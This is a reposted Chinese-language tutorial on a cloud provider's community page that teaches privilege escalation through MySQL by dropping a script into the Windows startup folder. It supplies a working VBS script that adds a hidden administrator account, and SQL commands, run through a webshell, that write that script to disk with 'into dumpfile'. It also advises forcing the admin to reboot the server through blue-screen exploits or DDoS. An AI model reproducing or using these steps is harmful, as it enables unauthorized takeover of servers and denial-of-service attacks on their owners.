MySQL啟動項提權

來源:互聯網
上載者:User

標籤:min   提示   mini   nis   使用者   doc   .com   win   exp   

關於MySQL的啟動項提權,聽其名知其意。就是將一段 VBS指令碼匯入到  C:\Documents and Settings\All Users\「開始」菜單\程式\啟動 下,如果管理員重啟了伺服器,那麼就會自動調用該指令碼,並執行其中的使用者添加及提權命令!

這裡有兩種思路:

1. 如果  C:\Documents and Settings\All Users\「開始」菜單\程式\啟動 目錄存在可讀寫的許可權,那麼我們可以直接將 VBS 提權指令碼上傳到該目錄下!

VBS 提權指令碼代碼如下:

setwsnetwork=CreateObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&”/Administrators,group”)
Set od=ob.Create(“user”,”secist”)
od.SetPassword “secist.com”
od.SetInfo
Set of=GetObject(os&“/secist”,user)
oe.add os&“/secist”

將以上代碼儲存為 .vbs 尾碼的檔案上傳即可!

2. 通過大馬的MySQL執行功能,利用SQL命令來進行VBS指令碼的建立及添加。

create table secist(cmd text);

insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);

insert into secist values(“a=wshshell.run(“”cmd.exe /c net user secist secist.com /add“”,0)”);

insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators secist /add“”,0)”);

select * from secist into dumpfile “C:\Documents and Settings\All Users\「開始」菜單\程式\啟動\secist.vbs”;

成功執行以上命令後,只要管理員重啟了伺服器,我們就可以成功提權了!

溫馨提示:

1.關於重啟目標伺服器,我們可以利用一些可導致伺服器藍屏的EXP,或者DDoS拒絕服務!

2.上傳的目錄必須具備可讀寫的許可權!

3.調用的 cmd 也必須有足夠的許可權!

MySQL啟動項提權

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.